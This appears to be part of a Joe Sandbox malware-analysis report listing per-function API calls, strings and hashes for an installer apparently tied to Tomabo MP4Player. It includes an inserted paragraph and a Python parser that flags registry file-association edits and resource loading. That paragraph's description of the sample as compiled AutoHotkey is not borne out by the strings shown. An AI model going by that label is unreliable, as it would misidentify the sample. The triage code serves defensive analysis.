                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MetricsRectSystem$AdjustInflateWindow
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 4080371637-0
                                                                                                                                                                                                  • Opcode ID: e450b1ea20e8b385e92255fcb816b920db64138bc9d05819fd9d4f2063a771c8
                                                                                                                                                                                                  • Instruction ID: f3b5b6be49cef8182e00ad75972e18ff325e7c96475021207ce59f40245c6238
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e450b1ea20e8b385e92255fcb816b920db64138bc9d05819fd9d4f2063a771c8
                                                                                                                                                                                                  • Instruction Fuzzy Hash: DFF0C835341294BBE7509B95DE09F6E3B58DB50710F04801ABE095A1E0C7745910DFAA
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • AttachConsole.KERNEL32(?), ref: 0041C39E
                                                                                                                                                                                                  • GenerateConsoleCtrlEvent.KERNEL32(00000001,?), ref: 0041C3AE
                                                                                                                                                                                                  • FreeConsole.KERNEL32 ref: 0041C3B6
                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,00001770), ref: 0041C3C8
                                                                                                                                                                                                  • TerminateProcess.KERNEL32(?,00000001), ref: 0041C3DF
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Console$AttachCtrlEventFreeGenerateObjectProcessSingleTerminateWait
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1848478052-0
                                                                                                                                                                                                  • Opcode ID: fdee16bfe9d2d86ac9841e1308da5e281162cb2bb2986ac1b596b3f92fcaa4be
                                                                                                                                                                                                  • Instruction ID: 5896004366eb8f4b653af84ae7d5d37ffa16aa7ae703d54d6a6e70a51499b322
                                                                                                                                                                                                  • Opcode Fuzzy Hash: fdee16bfe9d2d86ac9841e1308da5e281162cb2bb2986ac1b596b3f92fcaa4be
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0CF03A71244205AFE7101F62EC88F96BBA6BB00755F00C83AF955D26B0C7F9E8918B08
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00491DDF
                                                                                                                                                                                                    • Part of subcall function 0048EE23: __EH_prolog.LIBCMT ref: 0048EE28
                                                                                                                                                                                                    • Part of subcall function 0048F339: __EH_prolog.LIBCMT ref: 0048F33E
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                                                                  • String ID: Missing ',' or '}' in object declaration$Missing ':' after object member name$Missing '}' or object member name
                                                                                                                                                                                                  • API String ID: 3519838083-3980781130
                                                                                                                                                                                                  • Opcode ID: c1c9d5f3be0390123a207f77d977832238099d7d7e35d800a8f6910004c3188b
                                                                                                                                                                                                  • Instruction ID: 6a0c180941d8d4d700cc4af718e5ce6e2fcf85a96033dbb7c25faebe173d8375
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c1c9d5f3be0390123a207f77d977832238099d7d7e35d800a8f6910004c3188b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 98C1FF30904248EECF24EBA1C556AEEBF78AF11314F14406FF85677286DA7C4B49CB29
APIs
• GlobalLock.KERNEL32(?), ref: 004B8895
• lstrlenW.KERNEL32(00000000), ref: 004B88DF
• GlobalUnlock.KERNEL32(00000000), ref: 004B8976
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: Global$LockUnlocklstrlen
• String ID: System
• API String ID: 1794151802-3470857405
• Opcode ID: 45d4ce6010c160a4a427d08c90295743c021812c5b86f8d8abfce8ba5614e610
• Instruction ID: 00e1cc0ab22a96276ab0e4c66809288a09e7f605c82473ae58eb7ac6ec52dafd
• Opcode Fuzzy Hash: 45d4ce6010c160a4a427d08c90295743c021812c5b86f8d8abfce8ba5614e610
• Instruction Fuzzy Hash: 7531C675800216DBCF14DF68C8855FE7BB8FF00304F54816ED815AB254D7399946CB99
APIs
• GetParent.USER32(?), ref: 004C4538
  • Part of subcall function 004B5758: SetWindowPos.USER32(?,00000000,?,00000014,?,?,?,?,004021A9,00000000,?,?,?,?,00000014), ref: 004B577F
• GetWindowLongW.USER32(C0850000,000000F0), ref: 004C45D5
• UpdateWindow.USER32(?), ref: 004C45EE
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: Window$LongParentUpdate
• String ID: P
• API String ID: 1906497633-3110715001
• Opcode ID: 6594fa3239d2cd0a19eb978beb7ae89f1ecedb22a16269624737e05a8230e2a0
• Instruction ID: 2e7ce613fdd664413651c357c71a513fdd5583651df9c7bdeb529e4ce43d0c54
• Opcode Fuzzy Hash: 6594fa3239d2cd0a19eb978beb7ae89f1ecedb22a16269624737e05a8230e2a0
• Instruction Fuzzy Hash: 1A31DEB5200709BBDB619F21DD58FAE7BA9FF80714F00052EFA42562A1CB399D10CB68
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: H_prolog
• String ID: aac_adtstoasc$concat:$copy
• API String ID: 3519838083-2592638280
• Opcode ID: 385adcddf67bbd7d6f77071224798933e3dca607932c2b4f99f1162f150c5496
• Instruction ID: 8f045303ce01ab06eb8329de2e53be223cbe13808d2a416d48b03fb7f6d97beb
• Opcode Fuzzy Hash: 385adcddf67bbd7d6f77071224798933e3dca607932c2b4f99f1162f150c5496
• Instruction Fuzzy Hash: 0031A23090011A9BCF24EF66C891EEEF770EF14318F10449EB455A3191EB786A45CB95
APIs
• __EH_prolog.LIBCMT ref: 0041CC3F
  • Part of subcall function 0041C696: __EH_prolog.LIBCMT ref: 0041C69B
  • Part of subcall function 0041CE46: lstrlenW.KERNEL32(00000000), ref: 0041CE5D
  • Part of subcall function 0041CE46: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 0041CE76
  • Part of subcall function 0041CE46: RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 0041CE92
  • Part of subcall function 0041CE46: RegCloseKey.ADVAPI32(?), ref: 0041CEA2
  • Part of subcall function 0041CE46: RegDeleteKeyW.ADVAPI32(?,00000000), ref: 0041CEB0
  • Part of subcall function 004B1F26: InterlockedDecrement.KERNEL32(-000000F4), ref: 004B1F3A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: H_prolog$CloseDecrementDeleteEnumInterlockedOpenlstrlen
• String ID: %s\DefaultIcon$%s\shell\open\%s$command
• API String ID: 789564858-2593464833
• Opcode ID: 56e555a6971960f43327c406da320ae949e7ffa2efec88c965a4d083605f1776
• Instruction ID: fec8b11ba4b10b2e7b6c4babc4b1b5085061928872d7e27d56e5a6500f68e4f1
• Opcode Fuzzy Hash: 56e555a6971960f43327c406da320ae949e7ffa2efec88c965a4d083605f1776
• Instruction Fuzzy Hash: 9E31A170A40249EFCF00EBA5CD91AEEBBB9AF08304F10446EF015A3261C73C5E44DB69
APIs
• GetMenuCheckMarkDimensions.USER32 ref: 004C5032
• CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 004C50E1
• LoadBitmapW.USER32(00000000,00007FE3), ref: 004C50F9
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu
• String ID:
• API String ID: 2596413745-3916222277
• Opcode ID: b0b26ef09b01f33c307c11c67eb990ecd7e1ce4f05c16f58a849ef120345332c
• Instruction ID: cd1c9671a03333e4aec7101ade37b985362a8fcd17bad1f24785a9de7211e845
• Opcode Fuzzy Hash: b0b26ef09b01f33c307c11c67eb990ecd7e1ce4f05c16f58a849ef120345332c
• Instruction Fuzzy Hash: F4213A76E00215AFEB10CB79CC89FAE7BB4EB44714F05416AE505EB382D774AA44CB94
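The blocks in this section are per-function records from the Joe Sandbox IDA plugin: the API calls a function (or its subcalls) makes with their call-site addresses, the strings it references, and opcode/instruction IDs for similarity search. Two of these functions are the ones to pivot on when triaging a compiled AutoHotkey sample such as this one: the routine whose subcall opens, enumerates and deletes registry keys while formatting `%s\DefaultIcon`, `%s\shell\open\%s` and `command` (file-association keys), and the routine below it that calls SizeofResource, LoadResource and LockResource and fails with "Unable to load resource!" (a compiled AutoHotkey binary carries its script in a resource, so a resource loader is the natural starting point for recovering it). The following Python is an added example, not code from the report or from Joe Sandbox: it parses listings in the layout shown here (bullet lines grouped under the APIs, Strings and Similarity headers) into records and applies two API-plus-string flagging rules. The sample text is copied from this section with non-essential bullets dropped; the rule names and the `flag` function are the example's own.

```python
"""Parse Joe Sandbox IDA-plugin function listings (APIs / Strings / Similarity) into
records and flag API+string combinations worth pivoting on.  Added example; not Joe Sandbox code."""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Two blocks copied from this report (registry routine, resource loader), non-essential
# bullets dropped.  The loader block is truncated in the report, so it has no Similarity lines.
SAMPLE = r"""
APIs
• __EH_prolog.LIBCMT ref: 0041CC3F
  • Part of subcall function 0041CE46: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 0041CE76
  • Part of subcall function 0041CE46: RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 0041CE92
  • Part of subcall function 0041CE46: RegDeleteKeyW.ADVAPI32(?,00000000), ref: 0041CEB0
Strings
Similarity
• String ID: %s\DefaultIcon$%s\shell\open\%s$command
• Instruction Fuzzy Hash: 9E31A170A40249EFCF00EBA5CD91AEEBBB9AF08304F10446EF015A3261C73C5E44DB69
APIs
• SizeofResource.KERNEL32(?,?,00000000,?,?,74DE1F60,00435218,00000000,?,00000003), ref: 0043D328
• LoadResource.KERNEL32(?,?,?,?,74DE1F60,00435218,00000000,?,00000003), ref: 0043D332
• LockResource.KERNEL32(00000000,?,?,74DE1F60,00435218,00000000,?,00000003), ref: 0043D33D
Strings
• Unable to load resource!, xrefs: 0043D382
"""

SECTIONS = ("APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity")
SUBCALL_RE = re.compile(r"^Part of subcall function (?P<caller>[0-9A-Fa-f]+): (?P<rest>.*)$")
API_RE = re.compile(r"^(?P<name>[A-Za-z_]\w*)\.(?P<mod>\w+)"
                    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
STRING_RE = re.compile(r"^(?P<text>.*), xrefs: (?P<ref>[0-9A-Fa-f]+)$")

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str                    # call-site address
    subcall_of: Optional[str]   # callee address when listed under "Part of subcall function"

@dataclass
class FunctionRecord:
    apis: List[ApiCall] = field(default_factory=list)
    strings: List[Tuple[str, str]] = field(default_factory=list)   # (text, xref)
    string_ids: List[str] = field(default_factory=list)           # Similarity "String ID" parts
    fuzzy_hash: str = ""

def parse_listing(text: str) -> List[FunctionRecord]:
    """Each 'APIs' header opens a new function record; bullets are routed by section."""
    records, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            section = line
            if line == "APIs":
                cur = FunctionRecord()
                records.append(cur)
            continue
        if cur is None or not line.startswith("•"):
            continue
        body = line[1:].strip()
        if section == "APIs":
            caller, sub = None, SUBCALL_RE.match(body)
            if sub:
                caller, body = sub.group("caller"), sub.group("rest")
            if m := API_RE.match(body):
                args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
                cur.apis.append(ApiCall(m.group("name"), m.group("mod"), args, m.group("ref"), caller))
        elif section == "Strings":
            if m := STRING_RE.match(body):
                cur.strings.append((m.group("text"), m.group("ref")))
        elif section == "Similarity":
            key, _, value = body.partition(":")
            if key == "String ID":
                cur.string_ids = [s for s in value.strip().split("$") if s]
            elif key == "Instruction Fuzzy Hash":
                cur.fuzzy_hash = value.strip()
    return records

# (label, API names that must all appear, regex that must hit one of the function's strings or None)
RULES = [
    ("shell_association_registry_edit", {"RegOpenKeyW", "RegEnumKeyW", "RegDeleteKeyW"},
     re.compile(r"\\shell\\open|DefaultIcon", re.IGNORECASE)),
    ("embedded_resource_loader", {"LoadResource", "LockResource"}, None),
]

def flag(rec: FunctionRecord) -> List[str]:
    """Labels whose required APIs are all present and whose string pattern, if any, hits."""
    names = {a.name for a in rec.apis}
    haystack = rec.string_ids + [text for text, _ in rec.strings]
    return [label for label, apis, pattern in RULES
            if apis <= names and (pattern is None or any(pattern.search(s) for s in haystack))]

if __name__ == "__main__":
    for rec in parse_listing(SAMPLE):
        print(rec.apis[0].ref if rec.apis else "?", flag(rec))
```

Running the file prints the first call-site address and the labels for each of the two sample functions; to work a full report, pass the text of the whole function listing to `parse_listing` instead of `SAMPLE`. The rules key only on API names plus strings, which is deliberate: the `Instruction Fuzzy Hash` is kept on the record so the same function can be matched across other samples, but it is not used for flagging because it changes with any recompilation.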
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SizeofResource.KERNEL32(?,?,00000000,?,?,74DE1F60,00435218,00000000,?,00000003), ref: 0043D328
                                                                                                                                                                                                  • LoadResource.KERNEL32(?,?,?,?,74DE1F60,00435218,00000000,?,00000003), ref: 0043D332
                                                                                                                                                                                                  • LockResource.KERNEL32(00000000,?,?,74DE1F60,00435218,00000000,?,00000003), ref: 0043D33D
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • Unable to load resource!, xrefs: 0043D382
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Resource$LoadLockSizeof
                                                                                                                                                                                                  • String ID: Unable to load resource!
                                                                                                                                                                                                  • API String ID: 2853612939-3921374161
                                                                                                                                                                                                  • Opcode ID: 9d8ec5a6353fa18ddccf2d86107076021da45e9bf48ecd02208cdbcf78f8e2d1
                                                                                                                                                                                                  • Instruction ID: 49d7a7b901b44406962a5e494d930b75bd3da6f0b920210d31b361e2e7177845
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9d8ec5a6353fa18ddccf2d86107076021da45e9bf48ecd02208cdbcf78f8e2d1
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E111D372604240AFC7049F6ADC40B6BBBE8FB9A720F44062EF916C32D1DB789C05C765
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 004382B2
                                                                                                                                                                                                    • Part of subcall function 00437D76: __EH_prolog.LIBCMT ref: 00437D7B
                                                                                                                                                                                                    • Part of subcall function 004B20BD: lstrlenW.KERNEL32(00000000,?,?,004B1CC0,?,?,00403D3C,00000000,?,?,00403D1B,?,?,?,?,00403D01), ref: 004B20CE
                                                                                                                                                                                                  Strings
Similarity
• API ID: H_prolog$lstrlen
• String ID: aac_adtstoasc$concat$copy
• API String ID: 3243491680-1557367015
• Opcode ID: 0d2ba9c0a9a13668a54af4d0c8ea16c84c5d3f318ab7096a0ea66635d750b20a
• Instruction ID: f1ade38cd9e8668c68e3fe14fbaa5e0c651bb8ade55481671895b5bd0dac48fd
• Opcode Fuzzy Hash: 0d2ba9c0a9a13668a54af4d0c8ea16c84c5d3f318ab7096a0ea66635d750b20a
• Instruction Fuzzy Hash: 5221CD31A00219AFCB34EF55CD92EEDB770AF08308F1000AEF64662290DFB95E45CB19
APIs
• __EH_prolog.LIBCMT ref: 0040D5A3
  • Part of subcall function 0041C59D: __EH_prolog.LIBCMT ref: 0041C5A2
Strings
Similarity
• API ID: H_prolog
• String ID: %s.%s%s$MP4Player$Tomabo
• API String ID: 3519838083-2079911099
• Opcode ID: a4a33f70646ac19fd81702855e24fac8bb74626ab651156e591efeca5679afa6
• Instruction ID: 93f07687206de2ab11bb54a0964612f6b33dd725ff148aa5dca0cadbb260788b
• Opcode Fuzzy Hash: a4a33f70646ac19fd81702855e24fac8bb74626ab651156e591efeca5679afa6
• Instruction Fuzzy Hash: D811A372900219BBCF04EBDACC05FEEBB74BF14314F10452EB425A3191DBB99A14D769
APIs
• __EH_prolog.LIBCMT ref: 00420A92
  • Part of subcall function 0042153F: __EH_prolog.LIBCMT ref: 00421544
• RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,00000001,00000000,?,?,?,Software\Classes\CLSID\%s,?), ref: 00420ACD
• RegCloseKey.ADVAPI32(?), ref: 00420AF7
  • Part of subcall function 004B1F26: InterlockedDecrement.KERNEL32(-000000F4), ref: 004B1F3A
Strings
• Software\Classes\CLSID\%s, xrefs: 00420AAC
Similarity
• API ID: H_prolog$CloseCreateDecrementInterlocked
• String ID: Software\Classes\CLSID\%s
• API String ID: 1622650550-3302616724
• Opcode ID: 93f4ed1151a81565849e5f977872057150cbca9691bce1b0980bc746a34e0315
• Instruction ID: d98bbd0ce6b85126162f18631f951b013c1cf60c17ac590b801265f395082e72
• Opcode Fuzzy Hash: 93f4ed1151a81565849e5f977872057150cbca9691bce1b0980bc746a34e0315
• Instruction Fuzzy Hash: 44016131A10129AACF10DBA6DD49EEFBF78EF05764F50062AF021E20D1D7754605C6A5
APIs
• __EH_prolog.LIBCMT ref: 0041D451
  • Part of subcall function 0041D19A: GetShortPathNameW.KERNEL32(?,00000000,000007FF), ref: 0041D1D1
• ShellExecuteW.SHELL32(00000000,00000000,explorer.exe,00000000,00000000,00000001), ref: 0041D4B5
Strings
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ExecuteH_prologNamePathShellShort
                                                                                                                                                                                                  • String ID: /select,"%s"$explorer.exe
                                                                                                                                                                                                  • API String ID: 4011813441-3683321831
                                                                                                                                                                                                  • Opcode ID: c281e3ab5816b88c0c75df0548d2431d1a3daf66df89f45728d00cb50b3a8fc4
                                                                                                                                                                                                  • Instruction ID: fdee19df1239073c361282a8f85b11776bebce52d52e3ecd5f339a8815315ea9
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c281e3ab5816b88c0c75df0548d2431d1a3daf66df89f45728d00cb50b3a8fc4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 16115BB090020EAEDF04EBA1DD85EFEBB78FF14358F60452EB411621A1DB795E08CA64
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00414A71
                                                                                                                                                                                                    • Part of subcall function 004B051D: ImageList_Create.COMCTL32(?,?,?,?,?), ref: 004B0532
                                                                                                                                                                                                  • ImageList_AddMasked.COMCTL32(?,00000000,00FF00FF,000000DD), ref: 00414ACF
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ImageList_$CreateH_prologMasked
                                                                                                                                                                                                  • String ID: <L$VGL
                                                                                                                                                                                                  • API String ID: 81051414-514139165
                                                                                                                                                                                                  • Opcode ID: d25c08a838fcf9e829e093a285da2bedf198c01a7c4e150225ed23b75c1d5a65
                                                                                                                                                                                                  • Instruction ID: 7a98cd0916257a7a7ea27b1dfb31bfd8ab50ae63ddcc3070286ce99856c9ae45
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d25c08a838fcf9e829e093a285da2bedf198c01a7c4e150225ed23b75c1d5a65
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5C018471590609AADB14DBA1CD06FFE73B4AF14318F20461FB121B21D1DBFC9E048669
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetStockObject.GDI32(00000011), ref: 004012BD
                                                                                                                                                                                                  • GetStockObject.GDI32(0000000D), ref: 004012C5
                                                                                                                                                                                                  • GetObjectW.GDI32(00000000,0000005C,?), ref: 004012D5
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
